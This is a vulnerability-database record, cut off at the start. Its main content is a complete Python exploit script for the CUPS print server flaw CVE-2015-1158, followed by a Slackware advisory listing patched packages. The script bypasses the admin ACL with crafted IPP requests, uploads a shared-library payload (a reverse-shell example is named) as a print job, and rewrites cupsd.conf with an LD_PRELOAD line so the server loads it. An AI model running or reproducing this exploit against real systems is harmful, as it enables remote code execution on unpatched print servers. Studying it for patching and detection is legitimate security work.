(\"python script.py <args>\\n\"\r\n \" -h, --help: Show this message\\n\"\r\n \" -a, --rhost: Target IP address\\n\"\r\n \" -b, --rport: Target IPP service port\\n\"\r\n \" -c, --lib /path/to/payload.so\\n\"\r\n \" -f, --stomp-only Only stomp the ACL (no postex)\\n\"\r\n \"\\n\"\r\n \"Examples:\\n\"\r\n \"python script.py -a 10.10.10.10 -b 631 -f\\n\"\r\n \"python script.py -a 10.10.10.10 -b 631 -c /tmp/x86reverseshell.so\\n\")\r\n exit()\r\n\r\ndef pretty (t, m):\r\n if (t is \"+\"):\r\n print \"\\x1b[32;1m[+]\\x1b[0m\\t\" + m + \"\\n\",\r\n elif (t is \"-\"):\r\n print \"\\x1b[31;1m[-]\\x1b[0m\\t\" + m + \"\\n\",\r\n elif (t is \"*\"):\r\n print \"\\x1b[34;1m[*]\\x1b[0m\\t\" + m + \"\\n\",\r\n elif (t is \"!\"):\r\n print \"\\x1b[33;1m[!]\\x1b[0m\\t\" + m + \"\\n\",\r\n\r\ndef createDump (input):\r\n d, b, h = '', [], []\r\n u = list(input)\r\n for e in u:\r\n h.append(e.encode(\"hex\"))\r\n if e == '0x0':\r\n b.append('0')\r\n elif 30 > ord(e) or ord(e) > 128:\r\n b.append('.')\r\n elif 30 < ord(e) or ord(e) < 128:\r\n b.append(e)\r\n\r\n i = 0\r\n while i < len(h):\r\n if (len(h) - i ) >= 16:\r\n d += ' '.join(h[i:i+16])\r\n d += \" \"\r\n d += ' '.join(b[i:i+16])\r\n d += \"\\n\"\r\n i = i + 16\r\n else:\r\n d += ' '.join(h[i:(len(h) - 0 )])\r\n pad = len(' '.join(h[i:(len(h) - 0 )]))\r\n d += ' ' * (56 - pad)\r\n d += ' '.join(b[i:(len(h) - 0 )])\r\n d += \"\\n\"\r\n i = i + len(h)\r\n\r\n return d\r\n\r\nclass tcpsock:\r\n def __init__(self, sock=None):\r\n if sock is None:\r\n self.sock = socket(\r\n AF_INET, SOCK_STREAM)\r\n self.sock.settimeout(30)\r\n else:\r\n self.sock = sock\r\n def connect(self, host, port):\r\n self.sock.connect((host, int(port)))\r\n def tx(self, msg):\r\n self.sock.send(msg)\r\n def rx(self):\r\n tmp = self.sock.recv(1024)\r\n msg = \"\"\r\n while tmp:\r\n msg += tmp\r\n tmp = self.sock.recv(1024)\r\n return msg\r\n\r\ndef txrx (ip, port, proto, txpacket):\r\n if (proto is \"tcp\"):\r\n sock = tcpsock()\r\n elif (proto is \"udp\"):\r\n sock = udpsock()\r\n else:\r\n return None\r\n sock.connect(ip, port)\r\n sock.tx(txpacket)\r\n rxpacket = sock.rx()\r\n return rxpacket\r\n\r\ndef locatePrinters(rhost, rport=\"631\"):\r\n request = ( \"GET /printers HTTP/1.1\\x0d\\x0a\"\r\n \"Host: \" + rhost + \":\" + rport + \"\\x0d\\x0a\"\r\n \"User-Agent: CUPS/2.0.2\\x0d\\x0a\"\r\n \"Connection: Close\\x0d\\x0a\"\r\n \"\\x0d\\x0a\")\r\n response = txrx(rhost, int(rport), \"tcp\", request)\r\n if response is not None:\r\n m = re.search('<TR><TD><A HREF=\"(.+)\">.+</A></TD><TD>.+</TD><TD></TD><TD>.+</TD><TD>', response)\r\n if m is not None:\r\n printer = m.group(1)\r\n pretty(\"+\",\"printer found: \" + printer)\r\n else:\r\n pretty(\"-\",\"no printers\")\r\n exit(1)\r\n return printer\r\n\r\ndef preparePayload(libpath):\r\n with open(libpath, 'rb') as f:\r\n payload = f.read()\r\n if payload is not None:\r\n pretty(\"*\",\"Payload:\\n\" + createDump(payload))\r\n else:\r\n pretty(\"-\",\"something went wrong\")\r\n usage()\r\n return payload\r\n\r\ndef seedTarget(rhost, rport, printer, payload):\r\n i = random.randint(1,3)\r\n reqid = str(pack(\">i\",(i+2)))\r\n reqid2 = str(pack(\">i\",(i+3)))\r\n printer_uri = \"ipp://\" + rhost + \":\" + str(rport) + printer\r\n\r\n create_job_packet = (\"\\x02\\x00\"\r\n \"\\x00\\x05\"+\r\n reqid+\r\n \"\\x01\"\r\n \"\\x47\"+\"\\x00\\x12\"+\"attributes-charset\"+\"\\x00\\x05\"+\"utf-8\"\r\n \"\\x48\"+\"\\x00\\x1b\"+\"attributes-natural-language\"+\"\\x00\\x05\"+\"en-us\"\r\n \"\\x45\"+\"\\x00\\x0b\"+\"printer-uri\" + str(pack(\">h\", len(printer_uri))) + printer_uri +\r\n \"\\x42\"+\"\\x00\\x14\"+\"requesting-user-name\"+\"\\x00\\x04\"+\"root\"\r\n \"\\x42\"+\"\\x00\\x08\"+\"job-name\"+\"\\x00\\x06\"+\"badlib\"\r\n \"\\x02\"\r\n \"\\x21\"+\"\\x00\\x06\"+\"copies\"+\"\\x00\\x04\"+\"\\x00\\x00\\x00\\x01\"\r\n \"\\x23\"+\"\\x00\\x0a\"+\"finishings\"+\"\\x00\\x04\"+\"\\x00\\x00\\x00\\x03\"\r\n \"\\x42\"+\"\\x00\\x10\"+\"job-cancel-after\"+\"\\x00\\x05\"+\"\\x31\\x30\\x38\\x30\\x30\"\r\n \"\\x44\"+\"\\x00\\x0e\"+\"job-hold-until\"+\"\\x00\\x0a\"+\"indefinite\"\r\n \"\\x21\"+\"\\x00\\x0c\"+\"job-priority\"+\"\\x00\\x04\"+\"\\x00\\x00\\x00\\x32\"\r\n \"\\x42\"+\"\\x00\\x0a\"+\"job-sheets\"+\"\\x00\\x04\"+\"none\"+\"\\x42\"+\"\\x00\\x00\\x00\\x04\"+\"none\"\r\n \"\\x21\"+\"\\x00\\x09\"+\"number-up\"+\"\\x00\\x04\"+\"\\x00\\x00\\x00\\x01\"\r\n \"\\x03\")\r\n pretty(\"*\",\"Sending createJob\")\r\n\r\n http_header1 = ( \"POST \" + printer + \" HTTP/1.1\\x0d\\x0a\"\r\n \"Content-Type: application/ipp\\x0d\\x0a\"\r\n \"Host: \" + rhost + \":\" + str(rport) + \"\\x0d\\x0a\"\r\n \"User-Agent: CUPS/2.0.2\\x0d\\x0a\"\r\n \"Connection: Close\\x0d\\x0a\"\r\n \"Content-Length: \" + str(len(create_job_packet) + 0) + \"\\x0d\\x0a\"\r\n \"\\x0d\\x0a\")\r\n\r\n createJobRequest = http_header1 + create_job_packet\r\n blah = txrx(rhost,int(rport),\"tcp\",createJobRequest)\r\n if blah is not None:\r\n m = re.search(\"ipp://\" + rhost + \":\" + str(rport) + \"/jobs/(\\d+)\",blah)\r\n if m is not None:\r\n jobid = m.group(1)\r\n else:\r\n pretty(\"-\",\"something went wrong\");\r\n exit()\r\n\r\n pretty(\"*\",\"\\n\" + createDump(blah) + \"\\n\")\r\n pretty(\"*\", \"Sending sendJob\")\r\n\r\n send_document_packet = (\"\\x02\\x00\"\r\n \"\\x00\\x06\"+\r\n reqid2+\r\n \"\\x01\"\r\n \"\\x47\"+\"\\x00\\x12\"+\"attributes-charset\"+\"\\x00\\x05\"+\"utf-8\"\r\n \"\\x48\"+\"\\x00\\x1b\"+\"attributes-natural-language\"+\"\\x00\\x05\"+\"en-us\"\r\n \"\\x45\"+\"\\x00\\x0b\"+\"printer-uri\" + str(pack(\">h\", len(printer_uri))) + printer_uri +\r\n \"\\x21\"+\"\\x00\\x06\"+\"job-id\"+\"\\x00\\x04\"+ str(pack(\">i\", int(jobid))) +\r\n \"\\x42\"+\"\\x00\\x14\"+\"requesting-user-name\"+\"\\x00\\x04\"+\"root\"\r\n \"\\x42\"+\"\\x00\\x0d\"+\"document-name\"+\"\\x00\\x06\"+\"badlib\"\r\n \"\\x49\"+\"\\x00\\x0f\"+\"document-format\"+\"\\x00\\x18\"+\"application/octet-stream\"\r\n \"\\x22\"+\"\\x00\\x0d\"+\"last-document\"+\"\\x00\\x01\"+\"\\x01\"\r\n \"\\x03\"+\r\n payload)\r\n\r\n http_header2 = ( \"POST \" + printer + \" HTTP/1.1\\x0d\\x0a\"\r\n \"Content-Type: application/ipp\\x0d\\x0a\"\r\n \"Host: \" + rhost + \":\" + str(rport) + \"\\x0d\\x0a\"\r\n \"User-Agent: CUPS/2.0.2\\x0d\\x0a\"\r\n \"Connection: Close\\x0d\\x0a\"\r\n \"Content-Length: \" + str(len(send_document_packet) + 0) + \"\\x0d\\x0a\"\r\n \"\\x0d\\x0a\")\r\n\r\n sendJobRequest = http_header2 + send_document_packet\r\n blah2 = txrx(\"172.20.32.3\",631,\"tcp\",sendJobRequest)\r\n pretty(\"*\",\"\\n\" + createDump(blah) + \"\\n\")\r\n pretty(\"*\",\"job id: \" + jobid)\r\n return jobid\r\n\r\ndef stompACL(rhost, rport, printer):\r\n i = random.randint(1,1024)\r\n printer_url = \"ipp://\" + rhost + \":\" + rport + printer\r\n\r\n admin_stomp = (\"\\x02\\x00\" # vers 2.0\r\n \"\\x00\\x05\"+ # op id: Create Job (0x0005)\r\n str(pack(\">i\",(i+1)))+\r\n \"\\x01\" # op attributes marker\r\n \"\\x47\" # charset\r\n \"\\x00\\x12\" # name len: 18\r\n \"attributes-charset\"\r\n \"\\x00\\x08\" # val len: 8\r\n \"us-ascii\"\r\n \"\\x48\" # natural language\r\n \"\\x00\\x1b\" # name len: 27\r\n \"attributes-natural-language\"\r\n \"\\x00\\x06\" # val len: 6\r\n \"/admin\"\r\n \"\\x45\" # printer-uri\r\n \"\\x00\\x0b\" # name len 11\r\n \"printer-uri\" +\r\n str(pack(\">h\", len(printer_url))) + printer_url +\r\n \"\\x42\" # name without lang\r\n \"\\x00\\x14\" # name len: 20\r\n \"requesting-user-name\"\r\n \"\\x00\\x06\" # val len: 6\r\n \"/admin\"\r\n \"\\x02\" # job attrs marker\r\n \"\\x21\" # integer\r\n \"\\x00\\x06\" # name len: 6\r\n \"copies\"\r\n \"\\x00\\x04\" # val len: 4\r\n \"\\x00\\x00\\x00\\x01\" # 1\r\n \"\\x42\" # name w/o lang\r\n \"\\x00\\x19\" # name len: 25\r\n \"job-originating-host-name\"\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x36\" # nwl\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x16\" # val len: 22\r\n \"\\x00\\x06\" # length\r\n \"/admin\"\r\n \"\\x00\\x0c\"\r\n \"BBBBBBBBBBBB\"\r\n \"\\x03\") # end of attributes\r\n\r\n conf_stomp = (\"\\x02\\x00\" # vers 2.0\r\n \"\\x00\\x05\"+ # op id: Create Job (0x0005)\r\n str(pack(\">i\",(i+2)))+\r\n \"\\x01\" # op attributes marker\r\n \"\\x47\" # charset\r\n \"\\x00\\x12\" # name len: 18\r\n \"attributes-charset\"\r\n \"\\x00\\x08\" # val len: 8\r\n \"us-ascii\"\r\n \"\\x48\" # natural language\r\n \"\\x00\\x1b\" # name len: 27\r\n \"attributes-natural-language\"\r\n \"\\x00\\x0b\" # val len: 11\r\n \"/admin/conf\"\r\n \"\\x45\" # printer-uri\r\n \"\\x00\\x0b\" # name len 11\r\n \"printer-uri\" +\r\n str(pack(\">h\", len(printer_url))) + printer_url +\r\n \"\\x42\" # name without lang\r\n \"\\x00\\x14\" # name len: 20\r\n \"requesting-user-name\"\r\n \"\\x00\\x0b\" # val len: 11\r\n \"/admin/conf\"\r\n \"\\x02\" # job attrs marker\r\n \"\\x21\" # integer\r\n \"\\x00\\x06\" # name len: 6\r\n \"copies\"\r\n \"\\x00\\x04\" # val len: 4\r\n \"\\x00\\x00\\x00\\x01\" # 1\r\n \"\\x42\" # name w/o lang\r\n \"\\x00\\x19\" # name len: 25\r\n \"job-originating-host-name\"\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x36\" # nwl\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x1b\" # val len: 27\r\n \"\\x00\\x0b\" # length\r\n \"/admin/conf\"\r\n \"\\x00\\x0c\"\r\n \"BBBBBBBBBBBB\"\r\n \"\\x03\") # end of attributes\r\n\r\n http_header1 = (\"POST \" + printer + \" HTTP/1.1\\x0d\\x0a\"\r\n \"Content-Type: application/ipp\\x0d\\x0a\"\r\n \"Host: \" + rhost + \":\" + rport + \"\\x0d\\x0a\"\r\n \"User-Agent: CUPS/2.0.2\\x0d\\x0a\"\r\n \"Connection: Close\\x0d\\x0a\"\r\n \"Content-Length: \" + str(len(admin_stomp)) + \"\\x0d\\x0a\"\r\n \"\\x0d\\x0a\")\r\n\r\n http_header2 = (\"POST \" + printer + \" HTTP/1.1\\x0d\\x0a\"\r\n \"Content-Type: application/ipp\\x0d\\x0a\"\r\n \"Host: \" + rhost + \":\" + rport + \"\\x0d\\x0a\"\r\n \"User-Agent: CUPS/2.0.2\\x0d\\x0a\"\r\n \"Connection: Close\\x0d\\x0a\"\r\n \"Content-Length: \" + str(len(conf_stomp)) + \"\\x0d\\x0a\"\r\n \"\\x0d\\x0a\")\r\n\r\n pretty(\"*\",\"stomping ACL\")\r\n pretty(\"*\",\">:\\n\" + createDump(http_header1 + admin_stomp))\r\n pretty(\"*\",\"<:\\n\" + createDump(txrx(rhost,rport,\"tcp\",http_header1 + admin_stomp)))\r\n time.sleep(1)\r\n pretty(\"*\",\">:\\n\" + createDump(http_header2 + conf_stomp))\r\n pretty(\"*\",\"<:\\n\" + createDump(txrx(rhost,rport,\"tcp\",http_header2 + conf_stomp)))\r\n\r\n http_header_check = (\"GET /admin HTTP/1.1\\x0d\\x0a\"\r\n \"Host: \" + rhost + \":\" + rport + \"\\x0d\\x0a\"\r\n \"User-Agent: CUPS/2.0.2\\x0d\\x0a\"\r\n \"Connection: Close\\x0d\\x0a\"\r\n \"\\x0d\\x0a\")\r\n pretty(\"*\",\"checking /admin\")\r\n pretty(\"*\",\">:\\n\" + createDump(http_header_check))\r\n res = txrx(rhost,rport,\"tcp\",http_header_check)\r\n pretty(\"*\",\"<:\\n\" + createDump(res))\r\n m = re.search('200 OK', res)\r\n if m is not None:\r\n pretty(\"+\",\"ACL stomp successful\")\r\n else:\r\n pretty(\"-\",\"exploit failed\")\r\n exit(1)\r\n\r\n\r\ndef getConfig(rhost, rport):\r\n i = random.randint(1,1024)\r\n original_config = \"\"\r\n http_request = (\"GET /admin/conf/cupsd.conf HTTP/1.1\\x0d\\x0a\"\r\n \"Host: \" + rhost + \":\" + rport + \"\\x0d\\x0a\"\r\n \"User-Agent: CUPS/2.0.2\\x0d\\x0a\"\r\n \"Connection: Close\\x0d\\x0a\"\r\n \"\\x0d\\x0a\")\r\n\r\n pretty(\"*\",\"grabbing configuration file....\")\r\n res = txrx(rhost,rport,\"tcp\",http_request)\r\n res_array = res.split(\"\\x0d\\x0a\\x0d\\x0a\")\r\n original_config = res_array[1]\r\n pretty(\"*\",\"config:\\n\" + original_config + \"\\n\")\r\n return original_config\r\n\r\ndef putConfig(rhost, rport, config):\r\n http_request = (\"PUT /admin/conf/cupsd.conf HTTP/1.1\\x0d\\x0a\"\r\n \"Content-Type: application/ipp\\x0d\\x0a\"\r\n \"Host: \" + rhost + \":\" + rport + \"\\x0d\\x0a\"\r\n \"User-Agent: CUPS/2.0.2\\x0d\\x0a\"\r\n \"Connection: Keep-Alive\\x0d\\x0a\"\r\n \"Content-Length: \" + str(len(config)) + \"\\x0d\\x0a\"\r\n \"\\x0d\\x0a\")\r\n pretty(\"*\",\"overwriting config...\")\r\n pretty(\"*\",\">:\\n\" + createDump(http_request + config))\r\n pretty(\"*\",\"<:\\n\" + createDump(txrx(rhost,rport,\"tcp\",http_request + config)))\r\n\r\ndef poisonConfig(config, name):\r\n config = config + \"\\x0a\\x0aSetEnv LD_PRELOAD /var/spool/cups/d00\" + name + \"-001\\x0a\"\r\n return config\r\n\r\ndef main():\r\n rhost = None;\r\n noshell = None;\r\n options, remainder = getopt.getopt(sys.argv[1:], 'a:b:c:f:h:', ['rhost=','rport=','lib=','stomp-only','help',])\r\n for opt, arg in options:\r\n if opt in ('-h', '--help'):\r\n usage()\r\n elif opt in ('-a','--rhost'):\r\n rhost = arg;\r\n elif opt in ('-b','--rport'):\r\n rport = arg;\r\n elif opt in ('-c','--lib'):\r\n libpath = arg;\r\n elif opt in ('-f','--stomp-only'):\r\n noshell = 1;\r\n banner()\r\n if rhost is None or rport is None:\r\n usage()\r\n pretty(\"*\",\"locate available printer\")\r\n printer = locatePrinters(rhost, rport)\r\n pretty(\"*\",\"stomp ACL\")\r\n stompACL(rhost, rport, printer)\r\n if (noshell is not None):\r\n pretty(\"*\",\"fin\")\r\n exit(0)\r\n pretty(\"*\",\"prepare payload\")\r\n payload = preparePayload(libpath)\r\n pretty(\"*\",\"spray payload\")\r\n jobid = seedTarget(rhost, rport, printer, payload)\r\n pretty(\"*\",\"grab original config\")\r\n OG_config = getConfig(rhost, rport)\r\n pretty(\"*\",\"generate poison config\")\r\n evil_config = poisonConfig(OG_config, jobid)\r\n pretty(\"*\",\"upload poison config\")\r\n putConfig(rhost, rport, evil_config)\r\n pretty(\"*\",\"fin\")\r\n exit(0);\r\n\r\nif __name__ == \"__main__\":\r\n main()", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/41233/"}], "slackware": [{"lastseen": "2020-10-25T16:36:10", "bulletinFamily": "unix", "cvelist": ["CVE-2015-1158"], "description": "New cups packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1,\nand -current to fix a security issue.\n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n\npatches/packages/cups-1.5.4-i486-4_slack14.1.txz: Rebuilt.\n This release fixes a security issue:\n CWE-911: Improper Update of Reference Count - CVE-2015-1158\n This bug could allow an attacker to upload a replacement CUPS\n configuration file and mount further attacks.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1158\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/cups-1.3.11-i486-3_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/cups-1.3.11-x86_64-3_slack13.0.txz\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/cups-1.4.5-i486-3_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/cups-1.4.5-x86_64-3_slack13.1.txz\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/cups-1.4.6-i486-2_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/cups-1.4.6-x86_64-2_slack13.37.txz\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/cups-1.5.4-i486-3_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/cups-1.5.4-x86_64-3_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/cups-1.5.4-i486-4_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/cups-1.5.4-x86_64-4_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/ap/cups-2.0.3-i486-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/ap/cups-2.0.3-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 13.0 package:\nf013abe1761fb1a3a962ee6bb63bb12c cups-1.3.11-i486-3_slack13.0.txz\n\nSlackware x86_64 13.0 package:\n88c5e1cf46eab8fd0d101e8411f10251 cups-1.3.11-x86_64-3_slack13.0.txz\n\nSlackware 13.1 package:\nf71f2b3066f4af9c407df75b1535f179 cups-1.4.5-i486-3_slack13.1.txz\n\nSlackware x86_64 13.1 package:\n2bf27108c7c2772e8adbd984efb0c55e cups-1.4.5-x86_64-3_slack13.1.txz\n\nSlackware 13.37 package:\n0db4e57246873b1817f7332f90dd245f cups-1.4.6-i486-2_slack13.37.txz\n\nSlackware x86_64 13.37 package:\n8d3ce5ec82218ebb001c0b46d891895a cups-1.4.6-x86_64-2_slack13.37.txz\n\nSlackware 14.0 package:\nc9130b507a69775f68eb1ca71c2c746c cups-1.5.4-i486-3_slack14.0.txz\n\nSlackware x86_64 14.0 package:\ne91436f9885350bc63a2d9484f974e66 cups-1.5.4-x86_64-3_slack14.0.txz\n\nSlackware 14.1 package:\ne7887e9c90b7501edca14157a85f7c3c cups-1.5.4-i486-4_slack14.1.txz\n\nSlackware x86_64 14.1 package:\n712faf20c729a442d6229de6942aefc5 cups-1.5.4-x86_64-4_slack14.1.txz\n\nSlackware -current package:\nb92d4ad6d8da3487ca0445915ef6aa38 ap/cups-2.0.3-i486-1.txz\n\nSlackware x86_64 -current package:\nf740e4376110c797ef1926d5a94bea5a ap/cups-2.0.3-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg cups-1.5.4-i486-4_slack14.1.txz\n\nThen, restart the cups server:\n > sh /etc/rc.d/rc.cups restart", "modified": "2015-07-08T00:00:21", "published": "2015-07-08T00:00:21", "id": "SSA-2015-188-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2015&m=slackware-security.507395", "type": "slackware", "title": "[slackware-security] cups", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}